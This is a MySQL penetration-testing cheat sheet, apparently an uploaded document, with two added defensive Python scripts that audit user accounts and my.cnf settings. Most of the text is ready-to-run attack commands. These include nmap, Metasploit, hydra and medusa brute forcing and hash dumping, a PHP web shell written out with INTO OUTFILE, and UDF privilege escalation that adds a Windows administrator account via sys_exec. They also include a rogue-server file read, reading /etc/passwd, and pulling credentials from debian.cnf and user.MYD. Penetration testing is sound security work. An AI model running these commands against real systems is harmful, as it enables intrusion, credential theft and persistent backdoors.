MYSQL Pentesting Best Practices

This document provides best practices for pentesting MySQL databases. It discusses common MySQL ports and commands, enumeration tactics like user and database discovery, password cracking, privilege escalation, and extracting credentials from database backups and log files.

Uploaded by kocherla Manohar

MySQL
MySQL listens on TCP port 3306 by default.

What is MySQL?
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql

MySQL Connection

# LOCAL
mysql -u root           # Connect as root without a password
mysql -u root -p        # A password will be prompted for

# REMOTE
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Basic & interesting MySQL commands

show databases;
use <database>;
show tables;
describe <table_name>;

select grantee, table_schema, privilege_type FROM information_schema.schema_privileges; #Exact privileges
select user,file_priv from mysql.user where user='root'; #File privileges
select version();   #version
select @@version;   #version (system variable, not a function)
select user();      #User
select database();  #database name

#Try to execute code (do_system only exists if that UDF has been installed)
select do_system('id');
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write (needs the FILE privilege and a path permitted by secure_file_priv)
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';               #MySQL <= 5.6 (Password column)
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root'; #MySQL 5.7 (PASSWORD() is gone in 8.0)
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql   #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL Pentesting
Shodan search query:
port:3306

Enumeration

# !!!! You should edit --script-args for your MySQL server !!!

# Audits MySQL database server security configuration
nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root', \
  mysql-audit.password='foobar',mysql-audit.filename='nselib/data/mysql-cis.audit'" 192.168.x.x

# Bruteforce accounts and passwords against a MySQL server
nmap --script=mysql-brute --script-args userdb=users.txt,passdb=passwords.txt -p 3306 192.168.x.x

# Attempts to list all databases on a MySQL server (creds required)
nmap -sV --script=mysql-databases -p 3306 192.168.x.x

# Dumps the password hashes from a MySQL server in a format suitable for cracking (creds required)
nmap --script mysql-dump-hashes --script-args='username=root,password=secret' -p 3306 192.168.x.x

# Checks for MySQL servers with an empty password for root or anonymous
nmap -sV --script=mysql-empty-password -p 3306 192.168.x.x

# Performs valid-user enumeration against a MySQL server using a bug
nmap --script=mysql-enum -p 3306 192.168.x.x

# Connects to a MySQL server and prints information such as the protocol and version numbers,
# thread ID, status, capabilities, and the password salt
nmap -sV -sC -p 3306 192.168.x.x

# Runs a query against a MySQL database and returns the results as a table (creds required)
nmap --script mysql-query --script-args='query="<query>"[,username=<username>,password=<password>]' -p 3306 192.168.x.x

# Attempts to list all users on a MySQL server
nmap -sV --script=mysql-users -p 3306 192.168.x.x

# Attempts to show all variables on a MySQL server
nmap -sV --script=mysql-variables -p 3306 192.168.x.x

# Attempts to bypass authentication in MySQL and MariaDB servers by exploiting CVE-2012-2122.
# If the server is vulnerable, it will also attempt to dump the MySQL usernames and password hashes
nmap --script mysql-vuln-cve2012-2122 -p3306 192.168.x.x

Some of the enumeration actions require valid credentials

msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump      #Need Credential
msf> use auxiliary/admin/mysql/mysql_enum            #Need Credential
msf> use auxiliary/scanner/mysql/mysql_schemadump    #Need Credential
msf> use exploit/windows/mysql/mysql_start_up        #Execute commands on Windows, Need Credential

Brute Forcing

hydra -L usernames.txt -P pass.txt <IP> mysql
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

Write any binary data

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL arbitrary file read by client

When you run LOAD DATA LOCAL to load the content of a file into a table, the MySQL or MariaDB server asks the client to read the file and send its content. So, if you can make a mysql client connect to a MySQL server you control, you can read arbitrary files from the client's host. Note that this is the behaviour when using:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

Notice the "local" keyword, because without "local" you get:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Initial PoC: https://github.com/allyshka/Rogue-MySql-Server

In this paper you can find a complete description of the attack and even how to extend it to RCE: https://paper.seebug.org/1113/

An overview of the attack: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

MySQL User

It will be very interesting if mysqld is running as root; check the user option in the server config:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"

Privilege escalation

Current Level of access
mysql> select user();
mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from mysql.user where user='OUTPUT OF select user()';
#The password column exists up to 5.6; from 5.7 it is authentication_string

Access Passwords
mysql> use mysql
mysql> select user,password from user;

Create a new user and grant him privileges
mysql> create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

Break into a shell
mysql> \! cat /etc/passwd
mysql> \! bash
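The account review above is what a defender should run regularly too. The following is an added example (not from the original page) that flags the weaknesses those queries expose: anonymous or empty-password accounts, wildcard hosts, and FILE, SUPER or GRANT OPTION held by accounts reachable from the network. The rows are constructed sample output, not real data.

```python
# Added example (not from the page): a defensive review of mysql.user rows,
# the same columns the queries above read. SAMPLE_ROWS is constructed output
# of SELECT User,Host,authentication_string,File_priv,Super_priv,Grant_priv
# FROM mysql.user; printed tab-separated (mysql -B); hashes are placeholders.
SAMPLE_ROWS = """\
User\tHost\tauthentication_string\tFile_priv\tSuper_priv\tGrant_priv
root\tlocalhost\t*PLACEHOLDER_HASH_1\tY\tY\tY
root\t%\t\tY\tY\tY
app\t10.0.0.%\t*PLACEHOLDER_HASH_2\tN\tN\tN
test\t%\t*PLACEHOLDER_HASH_3\tN\tN\tY
\tlocalhost\t\tN\tN\tN
"""

def parse_rows(text):
    """Turn tab-separated query output into dicts keyed by the header row."""
    lines = text.strip("\n").split("\n")
    header = lines[0].split("\t")
    return [dict(zip(header, line.split("\t"))) for line in lines[1:]]

def audit_user_rows(text):
    """Return one finding per weakness that the cheat sheet's queries would expose."""
    findings = []
    for r in parse_rows(text):
        who = f"'{r['User']}'@'{r['Host']}'"
        remote = r["Host"] != "localhost"
        if r["User"] == "":
            findings.append(f"{who}: anonymous account")
        if r["authentication_string"] == "":
            findings.append(f"{who}: empty password (mysql-empty-password finds this)")
        if r["Host"] == "%":
            findings.append(f"{who}: allowed from any host")
        if r["File_priv"] == "Y" and remote:
            findings.append(f"{who}: FILE privilege usable remotely (load_file/INTO OUTFILE)")
        if r["Super_priv"] == "Y" and remote:
            findings.append(f"{who}: SUPER privilege usable remotely")
        if r["Grant_priv"] == "Y" and r["User"] != "root":
            findings.append(f"{who}: non-root account holds WITH GRANT OPTION")
    return findings

if __name__ == "__main__":
    for finding in audit_user_rows(SAMPLE_ROWS):
        print(finding)
```

Feed it the real output of the SELECT above (mysql -B -e "...") to get the same findings for a live server.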

Privilege Escalation via library

You can find compiled versions of these libraries in sqlmap:

locate lib_mysqludf_sys.so
locate lib_mysqludf_sys.dll

Instead of locate you can also use whereis to search for these libraries on the host.

Linux

use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from npn into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('id > /tmp/out.txt');

Windows

USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Extracting MySQL credentials from the database

SELECT User,Host,Password FROM mysql.user;
SELECT User,Host,authentication_string FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT User,Host,authentication_string FROM mysql.user;"

Inside /etc/mysql/debian.cnf you can find the plain-text password of the user debian-sys-maint:

cat /etc/mysql/debian.cnf

You can use these credentials to log in to the MySQL database.

Inside the file /var/lib/mysql/mysql/user.MYD you can find all the hashes of the MySQL users (the same ones you can extract from mysql.user inside the database). This applies to MySQL 5.7 and earlier; in 8.0 the grant tables are InnoDB and there is no user.MYD.

You can extract them with:

grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Enabling logging

You can enable logging of mysql queries inside /etc/mysql/my.cnf uncommenting the
following lines:

Useful Files

windows

- config.ini
- my.ini
  - windows\my.ini
  - winnt\my.ini
- /mysql/data/

unix

- my.cnf
  - /etc/my.cnf
  - /etc/mysql/my.cnf
  - /var/lib/mysql/my.cnf
  - ~/.my.cnf
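The config files listed above hold the settings this page depends on: the mysqld user, secure_file_priv, local_infile and the general query log. The following is an added example (not from the original page) that parses a [mysqld] section and reports those settings the way the grep in the MySQL User section does by hand; both config texts are constructed samples.

```python
# Added example (not from the page): audit the [mysqld] options that the
# attacks on this page rely on, from a my.cnf read off disk. Both config
# texts are constructed samples.
import re

WEAK_CNF = """\
[mysqld]
user = root
# secure_file_priv = /var/lib/mysql-files
local-infile = 1
general_log = 0
"""

HARDENED_CNF = """\
[mysqld]
user = mysql
secure_file_priv = /var/lib/mysql-files
local_infile = 0
general_log = 1
"""

def parse_mysqld_section(text):
    """Return [mysqld] key/value pairs; MySQL treats '-' and '_' alike in option names."""
    opts, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments, like grep -v "#" above
        if not line or line.startswith("!"):     # skip blanks and !includedir lines
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            section = m.group(1).lower()
            continue
        if section == "mysqld":
            key, _, value = line.partition("=")
            opts[key.strip().replace("-", "_").lower()] = value.strip().strip("\"'")
    return opts

def audit_mysqld(text):
    """One finding per setting that makes the file-read, file-write or UDF steps easier."""
    o, findings = parse_mysqld_section(text), []
    if o.get("user") == "root":
        findings.append("user=root: INTO DUMPFILE and UDF writes happen as root")
    if not o.get("secure_file_priv"):
        findings.append("secure_file_priv unset or empty: check SHOW VARIABLES; empty means unrestricted load_file()/INTO OUTFILE")
    if o.get("local_infile", "0").upper() in ("1", "ON", "TRUE"):
        findings.append("local_infile on: server accepts LOAD DATA LOCAL from clients")
    if o.get("general_log", "0").upper() not in ("1", "ON"):
        findings.append("general_log off: queries are not being logged")
    return findings
```

Run audit_mysqld() over the contents of each my.cnf path above; only the file actually loaded by mysqld (and any !includedir fragments) reflects the live server, so confirm with SHOW VARIABLES.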

Command History

- ~/.mysql.history

Log Files

- connections.log
- update.log
- common.log
